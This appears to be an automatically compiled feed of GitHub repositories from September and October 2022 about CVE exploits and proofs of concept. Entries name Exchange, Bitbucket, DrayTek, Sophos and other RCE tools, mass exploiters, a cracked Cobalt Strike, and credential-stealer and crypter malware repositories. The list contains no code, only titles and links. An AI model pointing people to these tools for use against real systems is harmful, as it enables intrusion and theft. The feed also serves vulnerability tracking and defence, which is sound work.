**CVE-2022-41082 is a SSRF vulnerability which leads to remote code execution (RCE) when PowerShell is accessible to the attacker. a very problematic issue for sys admins** : [krc0m/CVE-2022-41082](https://github.com/krc0m/CVE-2022-41082) create time: 2022-10-02T08:51:58Z

**no description** : [Boonjune/POC-CVE-2022-30600](https://github.com/Boonjune/POC-CVE-2022-30600) create time: 2022-10-02T08:43:05Z

**Check for NotProxyShell CVE-2022-40140 & CVE-2022-41082** : [mr-r3b00t/NotProxyShellHunter](https://github.com/mr-r3b00t/NotProxyShellHunter) create time: 2022-10-02T08:14:03Z

**C̷̫͙̦͒̈́̕͜V̵̺̟̘̮̩̻͕͎̝͌͆̀̒͗͠Ę̴̻͇͉͍̍͒̈̕-̸͚̰̺̓͑̓̓͂͒̈̈́͠͝2̸̨̳̘̞̰̹̻̟̅̽͐͝0̵̡̭̋̈́̅͐̉1̵̡̧͔͙̋̈́̔ͅ8̴̡̛͓͖̟̣̒̆̈́́̾̓̕ͅ-̸̺̣̰̓̊͗͒͘͝1̴̭̻̰̉̔͜͜͝4̷̤̍̈́͂̊͐8̷̬̠̓̄̈́̂̚͠4̶̨̢̧̢̺͈̰̹̑̾́͊̈́͜͠7̵̬̲̩̎͋͌̅̍́̎͋͝ ̵̨̞̥̪̝̤̻́̐̇̎͘̚M̴̩͆͑̒̆ị̷̰̱͕̗̝̍͂k̵̢̯͍̄́̉̅̚͘r̷̛͍̉̈́́͌͑o̸͕̘̳̫̞̠͎̿t̶̛̼͚̦̼̳̪̳͉̔̿̋̄̆̋̈́̚͜i̶͈̮͙͊̌͛̈́̈́̅̕͝k̸̛̳͙̺͍̫̟̤͉̫͐ͅ ̶̰̼̹̫̝̦͑̈́͌̌̎̽͐͘͠P̴̛͖̦͚̬̈́͐̑͑͒̌́͠͠ͅÿ̵͎̬̦̻̝̮̬́̈͗̑̄̑̄͝ṭ̴̘͔͙͍̙̈́̋̚͝ḩ̴̨̾̃́̿̐̎͋͌o̷̢̠͈̰̪̦͔̮̾̃̽̔̈́̍͊́͑ń̵̢̢̨͓̞̥̳̱͖̔͌̅͂͊̄͐̏̉ ̷̢̣͈͍̭͆̏͜Ë̸̛̲̑͂x̸̢̨̪͓͕̥̽̍̓̚͝͠p̶̖̟͇̮̒̈̈͂̅̀̊̅ļ̵̧̙̣̘̦̪̲͓̈́̃ͅo̴͕̐̈́̚ĭ̸̻̖̩̯̬̤͓̖̱͋́͜t̶̩̟͈̟̠̹̆̌̀́̈̈́** : [flux10n/CVE-2018-14847](https://github.com/flux10n/CVE-2018-14847) create time: 2022-10-02T04:21:52Z

**PoC of CVE-2022-24086** : [akr3ch/CVE-2022-24086](https://github.com/akr3ch/CVE-2022-24086) create time: 2022-10-01T13:53:49Z

**unauthenticated remote code execution in userportal and webadmin component of sophos firewall** : [sevous/CVE-2022-3236-RCE](https://github.com/sevous/CVE-2022-3236-RCE) create time: 2022-10-01T12:06:28Z

**Nmap scripts to detect exchange 0-day (CVE-2022-41082) vulnerability** : [Diverto/nse-exchange](https://github.com/Diverto/nse-exchange) create time: 2022-10-01T11:53:14Z

**CVE-2022-41082 is a SSRF vulnerability which leads to remote code execution (RCE) when PowerShell is accessible to the attacker. a very problematic issue for sys admins** : [spher0X/CVE-2022-41082-RCE](https://github.com/spher0X/CVE-2022-41082-RCE) create time: 2022-10-01T11:45:34Z

**VanillaForum 2.6.3 allows stored XSS.** : [hacky1997/CVE-2020-8825](https://github.com/hacky1997/CVE-2020-8825) create time: 2020-02-10T07:24:37Z

**A loader for zimbra 2022 rce (cve-2022-27925)** : [Inplex-sys/CVE-2022-27925](https://github.com/Inplex-sys/CVE-2022-27925) create time: 2022-10-01T10:33:55Z

**Metasploit Framework module for ProxyNotShell – CVE-2022-40140 & CVE-2022-41082** : [0daylabin/ProxyNotShell](https://github.com/0daylabin/ProxyNotShell) create time: 2022-10-01T10:03:24Z

**no description** : [cactuschibre/CVE-2022-35914-poc](https://github.com/cactuschibre/CVE-2022-35914-poc) create time: 2022-09-30T16:43:28Z

**PoC for CVE-2022-41082 RCE a.k.a ProxyNotShell** : [jml4da/CVE-2022-41082-POC](https://github.com/jml4da/CVE-2022-41082-POC) create time: 2022-10-01T05:30:48Z

**WonderCMS 3.1.3 - Authenticated Remote Code Execution** : [AkashLingayat/WonderCMS-CVE-2020-35314](https://github.com/AkashLingayat/WonderCMS-CVE-2020-35314) create time: 2022-10-01T04:14:20Z

**Laravel debug mode - Remote Code Execution (RCE)** : [hupe1980/CVE-2021-3129](https://github.com/hupe1980/CVE-2021-3129) create time: 2022-09-30T17:54:17Z

**PoC for CVE-2022-41082 RCE as known as ProxyNotShell** : [R007er/CVE-2022-41082-RCE](https://github.com/R007er/CVE-2022-41082-RCE) create time: 2022-09-30T20:59:46Z

**no description** : [kev1n-beaum0nt/CVE-2022-41082-RCE-POC](https://github.com/kev1n-beaum0nt/CVE-2022-41082-RCE-POC) create time: 2022-09-30T19:07:36Z

**CVE-2022-41040 Remote Code Exeuction vulnerability** : [kev1n-beaum0nt/CVE-2022-41040-RCE-POC](https://github.com/kev1n-beaum0nt/CVE-2022-41040-RCE-POC) create time: 2022-09-30T18:25:21Z

**PoC for CVE-2022-41082 RCE as known as ProxyNotShell** : [R007er/CVE-2022-41082-POC](https://github.com/R007er/CVE-2022-41082-POC) create time: 2022-09-30T17:51:47Z

**CVE-2022-41082 is a SSRF vulnerability which leads to remote code execution (RCE) when PowerShell is accessible to the attacker. a very problematic issue for sys admins** : [TimWallbey/CVE-2022-41082-PoC](https://github.com/TimWallbey/CVE-2022-41082-PoC) create time: 2022-09-30T17:23:29Z

**no description** : [Rcs55F/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/Rcs55F/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-09-30T15:10:59Z

**no description** : [Rcs55F/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/Rcs55F/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-09-30T15:05:06Z

**no description** : [Rcs55F/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/Rcs55F/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-09-30T15:03:35Z

**CVE-2022-41082 is a SSRF vulnerability which leads to remote code execution (RCE) when PowerShell is accessible to the attacker. a very problematic issue for sys admains** : [TimWallbey/CVE-2022-41082-RCE](https://github.com/TimWallbey/CVE-2022-41082-RCE) create time: 2022-09-30T12:48:08Z

**no description** : [nidhi7598/external_zlib-1.2.7_CVE-2022-37434](https://github.com/nidhi7598/external_zlib-1.2.7_CVE-2022-37434) create time: 2022-09-30T10:20:36Z

**CVE-2022-41082 RCE as known as ProxyNotShell** : [revers0id/CVE-2022-41082-PoC](https://github.com/revers0id/CVE-2022-41082-PoC) create time: 2022-09-30T09:33:39Z

**mass adding script for draytek vigor [CVE-2022-32548]** : [d4rk0x00/CVE-2022-32548-RCE](https://github.com/d4rk0x00/CVE-2022-32548-RCE) create time: 2022-09-30T07:17:19Z

**Vulnerability Details for CVE-2022-41218** : [V4bel/CVE-2022-41218](https://github.com/V4bel/CVE-2022-41218) create time: 2022-09-30T07:12:23Z

**no description** : [Yealid/CVE-2018-6574](https://github.com/Yealid/CVE-2018-6574) create time: 2022-09-30T02:26:41Z

**Tool for mass testing ZeroLogon vulnerability CVE-2020-1472** : [guglia001/MassZeroLogon](https://github.com/guglia001/MassZeroLogon) create time: 2022-09-30T00:03:12Z

**Apache 2.4.49 & 2.4.50 LFI to RCE exploit** : [Juuso1337/CVE-2021-41773](https://github.com/Juuso1337/CVE-2021-41773) create time: 2022-09-28T20:12:34Z

**Golang Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306** : [pizza-power/Golang-CVE-2021-44077-POC](https://github.com/pizza-power/Golang-CVE-2021-44077-POC) create time: 2022-09-29T14:07:54Z

**Don't be evil.** : [LovelyWei/CVE-2022-40126](https://github.com/LovelyWei/CVE-2022-40126) create time: 2022-09-29T13:59:44Z

**no description** : [Trinadh465/external_zlib_4.4_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_4.4_CVE-2018-25032) create time: 2022-09-29T09:59:39Z

**no description** : [d4rk0x00/CVE-2022-32548-batch](https://github.com/d4rk0x00/CVE-2022-32548-batch) create time: 2022-09-29T10:25:05Z

**no description** : [ruifi47/cve-2021-21300-PoC](https://github.com/ruifi47/cve-2021-21300-PoC) create time: 2022-09-29T00:49:29Z

**cve2018-6574-gogetRCE** : [Bj0rn-gungnir/cve2018-6574-gogetRCE](https://github.com/Bj0rn-gungnir/cve2018-6574-gogetRCE) create time: 2022-09-28T14:03:14Z

**Tiny File Manager v2.4.7 and below are vulnerable to Cross Site Scripting** : [whitej3rry/CVE-2022-40490](https://github.com/whitej3rry/CVE-2022-40490) create time: 2022-09-28T14:32:41Z

**New 0day sophos firewall(userportal and webadmin) remote code execution cv 9.8** : [Ziggy78/CVE-2022-3236-RCE-POC](https://github.com/Ziggy78/CVE-2022-3236-RCE-POC) create time: 2022-09-28T14:11:30Z

**no description** : [whitej3rry/CVE-2022-40916](https://github.com/whitej3rry/CVE-2022-40916) create time: 2022-09-16T14:07:35Z

**CVE-2022-30190 (Exploit Microsoft)** : [flux10n/CVE-2022-30190](https://github.com/flux10n/CVE-2022-30190) create time: 2022-03-02T12:17:56Z

**tool for exploiting whatsapp rce** : [d4rk0x00/CVE-2022-36934-POC](https://github.com/d4rk0x00/CVE-2022-36934-POC) create time: 2022-09-28T08:07:21Z

**Unauthenticated rce in sophos User Portal and Webadmin components mass exploitation tool** : [Xu0Tex1/CVE-2022-3236](https://github.com/Xu0Tex1/CVE-2022-3236) create time: 2022-09-28T07:41:43Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [Xu0Tex1/CVE-2022-32548-RCE-POC](https://github.com/Xu0Tex1/CVE-2022-32548-RCE-POC) create time: 2022-09-28T06:46:07Z

**An integer overflow in WhatsApp that results in remote code execution in an established video call.** : [F1uk369/CVE-2022-36934](https://github.com/F1uk369/CVE-2022-36934) create time: 2022-09-28T06:33:03Z

**CVE-2016-0010复现** : [Sunqiz/CVE-2016-0010-reproduction](https://github.com/Sunqiz/CVE-2016-0010-reproduction) create time: 2022-09-28T03:00:11Z

**ASUS router exploit + PoC** : [c0resploit/CVE-2021-44158](https://github.com/c0resploit/CVE-2021-44158) create time: 2022-09-27T18:17:42Z

**DrayTek Vigor Exploit + PoC** : [c0resploit/CVE-2022-32548](https://github.com/c0resploit/CVE-2022-32548) create time: 2022-09-27T18:16:48Z

**Fastjson exploit + PoC** : [c0resploit/CVE-2022-25845](https://github.com/c0resploit/CVE-2022-25845) create time: 2022-09-27T18:14:28Z

**Cisco Small Business RCE PoC + [included mass exploiter and scanner]** : [c0resploit/CVE-2022-20841](https://github.com/c0resploit/CVE-2022-20841) create time: 2022-09-27T18:09:49Z

**A POC of CVE-2022-30206** : [Malwareman007/CVE-2022-30206](https://github.com/Malwareman007/CVE-2022-30206) create time: 2022-09-26T19:38:24Z

**no description** : [RobertRevalo/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/RobertRevalo/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-09-26T17:26:33Z

**no description** : [RobertRevalo/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/RobertRevalo/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-09-26T17:14:52Z

**no description** : [RobertRevalo/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/RobertRevalo/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-09-26T17:13:27Z

**SonicWall SMA 100 Multiple Vulnerabilities, RCE** : [MaX0dexpoit/CVE-2021-20038](https://github.com/MaX0dexpoit/CVE-2021-20038) create time: 2022-09-26T13:36:19Z

**no description** : [sne4ker/apache-CVE-2021-41773-CVE-2021-42013](https://github.com/sne4ker/apache-CVE-2021-41773-CVE-2021-42013) create time: 2022-09-26T13:13:37Z

**DrayTek Vigor Routers RCE** : [MaX0dexpoit/CVE-2022-32548](https://github.com/MaX0dexpoit/CVE-2022-32548) create time: 2022-09-26T13:26:58Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [Xu0Tex1/CVE-2022-32548-Mass-Rce](https://github.com/Xu0Tex1/CVE-2022-32548-Mass-Rce) create time: 2022-09-26T13:06:23Z

**CVE-2022-39197 漏洞补丁. CVE-2022-39197 Vulnerability Patch.** : [burpheart/CVE-2022-39197-patch](https://github.com/burpheart/CVE-2022-39197-patch) create time: 2022-09-26T08:58:21Z

**A loader for bitbucket 2022 rce (cve-2022-36804)** : [Inplex-sys/CVE-2022-36804](https://github.com/Inplex-sys/CVE-2022-36804) create time: 2022-09-26T08:35:31Z

**cobaltstrike4.5版本破解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [lovechoudoufu/about_cobaltstrike4.5_cdf](https://github.com/lovechoudoufu/about_cobaltstrike4.5_cdf) create time: 2022-09-26T05:49:58Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2022-29581](https://github.com/nidhi7598/linux-4.19.72_CVE-2022-29581) create time: 2022-09-26T04:52:12Z

**A somewhat reliable PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection).** : [touchmycrazyredhat/CVE-2022-36804-RevSh](https://github.com/touchmycrazyredhat/CVE-2022-36804-RevSh) create time: 2022-09-25T20:09:04Z

**CVE-2022-1040** : [jam620/Sophos-Vulnerability](https://github.com/jam620/Sophos-Vulnerability) create time: 2022-09-25T15:15:01Z

**CVE-2022-27925** : [jam620/Zimbra](https://github.com/jam620/Zimbra) create time: 2022-09-25T15:09:49Z

**A simple PoC for Atlassian Bitbucket RCE [CVE-2022-36804]** : [tahtaciburak/cve-2022-36804](https://github.com/tahtaciburak/cve-2022-36804) create time: 2022-09-25T13:16:57Z

**PoC for CVE-2022-28282** : [Pwnrin/CVE-2022-28282](https://github.com/Pwnrin/CVE-2022-28282) create time: 2022-09-25T07:46:23Z

**Vulnerability to CVE-2021-4034 Pwnkit** : [flux10n/CVE-2021-4034](https://github.com/flux10n/CVE-2021-4034) create time: 2022-09-25T02:46:20Z

**CVE-2016-2098 POC** : [Shakun8/CVE-2016-2098](https://github.com/Shakun8/CVE-2016-2098) create time: 2022-09-24T22:58:04Z

**A POC OF CVE-2022-2274 (openssl)** : [Malwareman007/CVE-2022-2274](https://github.com/Malwareman007/CVE-2022-2274) create time: 2022-09-24T21:30:34Z

**writeup and poc for [CVE-2022-26809]** : [scoobyd00bi/CVE-2022-26809-RCE](https://github.com/scoobyd00bi/CVE-2022-26809-RCE) create time: 2022-09-24T19:21:48Z

**no description** : [purple-WL/Cobaltstrike-RCE-CVE-2022-39197](https://github.com/purple-WL/Cobaltstrike-RCE-CVE-2022-39197) create time: 2022-09-24T14:36:47Z

**Cobalt Strike RCE CVE-2022-39197** : [yqcs/CSPOC](https://github.com/yqcs/CSPOC) create time: 2022-09-24T08:14:36Z

**ASUS router exploit** : [expl0despl0it/CVE-2021-44158](https://github.com/expl0despl0it/CVE-2021-44158) create time: 2022-09-23T20:02:58Z

**DrayTek Vigor Exploit** : [expl0despl0it/CVE-2022-32548](https://github.com/expl0despl0it/CVE-2022-32548) create time: 2022-09-23T20:01:16Z

**Fastjson exploit** : [expl0despl0it/CVE-2022-25845](https://github.com/expl0despl0it/CVE-2022-25845) create time: 2022-09-23T20:00:22Z

**Cisco Small Business RCE [included mass exploiter and scanner]** : [expl0despl0it/CVE-2022-20841](https://github.com/expl0despl0it/CVE-2022-20841) create time: 2022-09-23T19:57:53Z

**no description** : [trhacknon/CVE-2022-36804-ReverseShell](https://github.com/trhacknon/CVE-2022-36804-ReverseShell) create time: 2022-09-23T18:06:20Z

**CVE-2022-31798 Proof of Concept** : [omarhashem123/CVE-2022-31798](https://github.com/omarhashem123/CVE-2022-31798) create time: 2022-09-23T14:13:26Z

**CVE-2022-31499 Proof of Concept** : [omarhashem123/CVE-2022-31499](https://github.com/omarhashem123/CVE-2022-31499) create time: 2022-09-23T14:11:30Z

**CVE-2022-31269 Proof of Concept** : [omarhashem123/CVE-2022-31269](https://github.com/omarhashem123/CVE-2022-31269) create time: 2022-09-23T14:04:20Z

**metasploit and python module for CVE-2022-26809 windows rpc rce via smb 445** : [Ziggy78/CVE-2022-26809-FULL-RCE](https://github.com/Ziggy78/CVE-2022-26809-FULL-RCE) create time: 2022-09-23T12:27:06Z

**PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)** : [Chocapikk/CVE-2022-36804-ReverseShell](https://github.com/Chocapikk/CVE-2022-36804-ReverseShell) create time: 2022-09-23T11:05:22Z

**Mass rce exploit for CVE-2022-36804 BITBUCKET SERVER UNAUTHENTICATED RCE** : [CEOrbey/CVE-2022-36804-MASS-RCE](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE) create time: 2022-09-23T08:43:52Z

**CVE-2022-39197(CobaltStrike XSS <=4.7) POC** : [xzajyjs/CVE-2022-39197-POC](https://github.com/xzajyjs/CVE-2022-39197-POC) create time: 2022-09-23T08:20:07Z

**Docker CVE-2022-37708** : [thekevinday/docker_lightman_exploit](https://github.com/thekevinday/docker_lightman_exploit) create time: 2022-09-22T23:06:08Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [Security-Rules/cobaltstrike4.5_cdf](https://github.com/Security-Rules/cobaltstrike4.5_cdf) create time: 2022-09-22T10:04:36Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [atomxw/cobaltstrike4.5_cdf](https://github.com/atomxw/cobaltstrike4.5_cdf) create time: 2022-09-22T08:55:36Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [shen771/cobaltstrike4.5_cdf](https://github.com/shen771/cobaltstrike4.5_cdf) create time: 2022-09-22T08:50:45Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [ginipropro/cobaltstrike4.5_cdf](https://github.com/ginipropro/cobaltstrike4.5_cdf) create time: 2022-09-22T07:15:06Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [zeoday/cobaltstrike4.5_cdf-1](https://github.com/zeoday/cobaltstrike4.5_cdf-1) create time: 2022-09-22T02:50:45Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [wwl012345/cobaltstrike4.5_cdf](https://github.com/wwl012345/cobaltstrike4.5_cdf) create time: 2022-09-22T02:30:09Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [LztCode/cobaltstrike4.5_cdf](https://github.com/LztCode/cobaltstrike4.5_cdf) create time: 2022-09-22T02:25:13Z

**WSO2 Arbitrary File Upload to Remote Command Execution (RCE)** : [hupe1980/CVE-2022-29464](https://github.com/hupe1980/CVE-2022-29464) create time: 2022-09-22T14:04:49Z

**cve-2022-39197 poc** : [burpheart/cve-2022-39197](https://github.com/burpheart/cve-2022-39197) create time: 2022-09-22T14:39:02Z

**PoC for exploiting CVE-2019-2729 on WebLogic** : [Luchoane/CVE-2019-2729_creal](https://github.com/Luchoane/CVE-2019-2729_creal) create time: 2022-09-22T11:57:08Z

**For detection of sitecore RCE - CVE-2021-42237** : [crankyyash/SiteCore-RCE-Detection](https://github.com/crankyyash/SiteCore-RCE-Detection) create time: 2022-09-22T12:32:11Z

**CVE-2018-6574** : [moorada/goGetRCE](https://github.com/moorada/goGetRCE) create time: 2022-09-22T08:26:28Z

**cobaltstrike4.5版本破/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等** : [lovechoudoufu/cobaltstrike4.5_cdf](https://github.com/lovechoudoufu/cobaltstrike4.5_cdf) create time: 2022-08-02T08:20:46Z

**CVE-2021-44228 POC / Example** : [bcdunbar/CVE-2021-44228-poc](https://github.com/bcdunbar/CVE-2021-44228-poc) create time: 2022-09-21T20:33:06Z

**no description** : [pswalia2u/CVE-2020-7246](https://github.com/pswalia2u/CVE-2020-7246) create time: 2022-09-16T10:36:19Z

**Creosote is our solution to searching for the tarfile vulnerability described by CVE-2007-4559.** : [advanced-threat-research/Creosote](https://github.com/advanced-threat-research/Creosote) create time: 2022-09-20T17:03:57Z

**Bitbucket CVE-2022-36804 unauthenticated remote command execution** : [kljunowsky/CVE-2022-36804-POC](https://github.com/kljunowsky/CVE-2022-36804-POC) create time: 2022-09-21T10:36:50Z

**no description** : [j-jasson/CVE-2015-5531-POC](https://github.com/j-jasson/CVE-2015-5531-POC) create time: 2022-09-21T09:57:58Z

**no description** : [EmaVirgRep/CVE-2018-11235](https://github.com/EmaVirgRep/CVE-2018-11235) create time: 2022-09-21T09:21:59Z

**A Proof-Of-Concept for the CVE-2021-44228 vulnerability.** : [ocastel/log4j-shell-poc](https://github.com/ocastel/log4j-shell-poc) create time: 2022-09-21T07:43:15Z

**no description** : [Caihuar/Joomla-cve-2015-8562](https://github.com/Caihuar/Joomla-cve-2015-8562) create time: 2022-09-21T07:40:02Z

**no description** : [Caihuar/Joomla-cve-2015-8562](https://github.com/Caihuar/Joomla-cve-2015-8562) create time: 2022-09-21T06:21:07Z

**CVE-2022-39197** : [safe3s/CVE-2022-39197](https://github.com/safe3s/CVE-2022-39197) create time: 2022-09-21T06:22:10Z

**ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators.** : [sornram9254/CVE-2022-38577-Processmaker](https://github.com/sornram9254/CVE-2022-38577-Processmaker) create time: 2022-09-21T04:29:42Z

**CROSS SITE SCRIPTING (XSS) ON "ACADEMY LEARNING MANAGEMENT SYSTEM" - PROOF OF CONCEPT (POC) CVE-2022-38553** : [4websecurity/CVE-2022-38553](https://github.com/4websecurity/CVE-2022-38553) create time: 2022-09-20T14:51:52Z

**Cisco RV series unauthenticated RCE laoder + mass scanner** : [Zerf0X/CVE-2022-20841-RCE](https://github.com/Zerf0X/CVE-2022-20841-RCE) create time: 2022-09-20T14:51:26Z

**CVE-2022-37059 Cross Site Scripting (XSS) in Admin Panel of Subrion CMS 4.2.1** : [RashidKhanPathan/Security-Research](https://github.com/RashidKhanPathan/Security-Research) create time: 2022-09-20T11:38:47Z

**Cisco Small Business RCE [included mass exploiter and scanner]** : [Expl0desploit/CVE-2022-20841](https://github.com/Expl0desploit/CVE-2022-20841) create time: 2022-09-20T13:26:04Z

**Proof of Concept exploit for CVE-2022-36804 affecting BitBucket versions <8.3.1** : [N0pch/CVE-2022-36804-mass-rce](https://github.com/N0pch/CVE-2022-36804-mass-rce) create time: 2022-09-20T10:41:47Z

**CVE-2022-36804 Atlassian Bitbucket Command Injection Vulnerability** : [Vulnmachines/bitbucket-cve-2022-36804](https://github.com/Vulnmachines/bitbucket-cve-2022-36804) create time: 2022-09-20T10:08:47Z

**Pentesterlab - CVE-2018-6574: go get RCE** : [EmaVirgRep/cve-2018-6574](https://github.com/EmaVirgRep/cve-2018-6574) create time: 2022-09-20T08:54:06Z

**no description** : [nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20347](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20347) create time: 2022-09-20T09:00:40Z

**no description** : [dileepdkumar/LayarKacaSiber-CVE-2021-41773](https://github.com/dileepdkumar/LayarKacaSiber-CVE-2021-41773) create time: 2022-09-20T03:45:24Z

**Somewhat Reliable PoC Exploit for CVE-2022-36804 (BitBucket Critical Command Injection)** : [BenHays142/CVE-2022-36804-PoC-Exploit](https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit) create time: 2022-09-20T02:35:53Z

**CVE-2022-31814 Exploitation Toolkit.** : [EvergreenCartoons/SenselessViolence](https://github.com/EvergreenCartoons/SenselessViolence) create time: 2022-09-18T11:10:04Z

**Proof of Concept exploit for CVE-2022-36804 affecting BitBucket versions <8.3.1** : [notxesh/CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) create time: 2022-09-19T13:15:13Z

**no description** : [CEOrbey/CVE-2022-36804-POC-RCE](https://github.com/CEOrbey/CVE-2022-36804-POC-RCE) create time: 2022-09-19T12:46:33Z

**no description** : [astring0/CVE-2022-99999-TCP-RCE](https://github.com/astring0/CVE-2022-99999-TCP-RCE) create time: 2022-09-19T09:25:15Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [rftg1000/CVE-2022-32548-draytek](https://github.com/rftg1000/CVE-2022-32548-draytek) create time: 2022-09-19T07:24:30Z

**CVE-2022-32548-RCE-POC** : [alexmention/CVE-2022-32548-RCE-POC](https://github.com/alexmention/CVE-2022-32548-RCE-POC) create time: 2022-09-19T06:55:03Z

**New #WordPress #0Day #BackupBuddy Plugin #LFI** : [Administrative2022/CVE-2022-31474-wordpress](https://github.com/Administrative2022/CVE-2022-31474-wordpress) create time: 2022-09-19T05:28:06Z

**no description** : [trhacknon/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/trhacknon/CVE-2022-0847-DirtyPipe-Exploit) create time: 2022-09-19T00:35:15Z

**A PoC for CVE-2022-2588 that triggers a WARNING** : [sang-chu/CVE-2022-2588](https://github.com/sang-chu/CVE-2022-2588) create time: 2022-09-18T21:35:19Z

**Turning Your Computer Into a GPS Tracker With Apple Maps** : [breakpointHQ/CVE-2022-32883](https://github.com/breakpointHQ/CVE-2022-32883) create time: 2022-09-18T15:51:52Z

**Magento store rce/shell upload exploit tool** : [N0pch/CVE-2022-24086-magento-rce](https://github.com/N0pch/CVE-2022-24086-magento-rce) create time: 2022-09-18T11:52:59Z

**All Credit to MaherAzzouzi (https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit). This is a copy of the exploit for CTFs** : [ECU-10525611-Xander/CVE-2022-37706](https://github.com/ECU-10525611-Xander/CVE-2022-37706) create time: 2022-09-18T08:04:08Z

**no description** : [touchmycrazyredhat/CVE-2022-27925-Revshell](https://github.com/touchmycrazyredhat/CVE-2022-27925-Revshell) create time: 2022-09-17T22:24:32Z

**Mass Unauthenticated Remote Code Execution in DrayTek Vigor(CVE-2022-32548) botnet version** : [n0zxRY0/CVE-2022-32548-RCE](https://github.com/n0zxRY0/CVE-2022-32548-RCE) create time: 2022-09-17T11:54:56Z

**no description** : [W1ngLess/CVE-2021-39172-RCE](https://github.com/W1ngLess/CVE-2021-39172-RCE) create time: 2022-09-17T07:58:33Z

**CVE-2019-0708, A tool which mass hunts for bluekeep vulnerability for exploitation.** : [Ravaan21/Bluekeep-Hunter](https://github.com/Ravaan21/Bluekeep-Hunter) create time: 2022-09-17T05:41:15Z

**APPLE IOS/IPADOS UP TO 15.6.1 KERNEL LOCAL PRIVILEGE ESCALATION** : [Administrative2022/CVE-2022-32917-POC](https://github.com/Administrative2022/CVE-2022-32917-POC) create time: 2022-09-16T17:50:58Z

**no description** : [danbudris/CVE-2022-23773-repro-target](https://github.com/danbudris/CVE-2022-23773-repro-target) create time: 2022-09-16T16:30:29Z

**PoC repro of CVE-2022-23773 in Go** : [danbudris/CVE-2022-23773-repro](https://github.com/danbudris/CVE-2022-23773-repro) create time: 2022-09-16T16:28:35Z

**github-fundamentals-CVenegas2022 created by GitHub Classroom** : [CS208/github-fundamentals-CVenegas2022](https://github.com/CS208/github-fundamentals-CVenegas2022) create time: 2022-09-16T14:21:21Z

**Windows TCP/IP unauthenticated Remote Code Execution Vulnerability.** : [Administrative2022/CVE-2022-34718-RCE-POC](https://github.com/Administrative2022/CVE-2022-34718-RCE-POC) create time: 2022-09-16T13:43:52Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2021-39696](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2021-39696) create time: 2022-09-16T11:28:52Z

**Mass exploitation scripts for 12 software which are affected by log4j rce** : [Administrative2022/CVE-2021-44228-RCE](https://github.com/Administrative2022/CVE-2021-44228-RCE) create time: 2022-09-16T10:59:58Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2021-39696](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2021-39696) create time: 2022-09-16T10:47:24Z

**Unauthenticated RCE in sophos webadmin and administrative console** : [Administrative2022/CVE-2022-1040](https://github.com/Administrative2022/CVE-2022-1040) create time: 2022-09-16T10:44:26Z

**A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.** : [CEOrbey/CVE-2022-36804-RCE](https://github.com/CEOrbey/CVE-2022-36804-RCE) create time: 2022-09-16T10:14:26Z

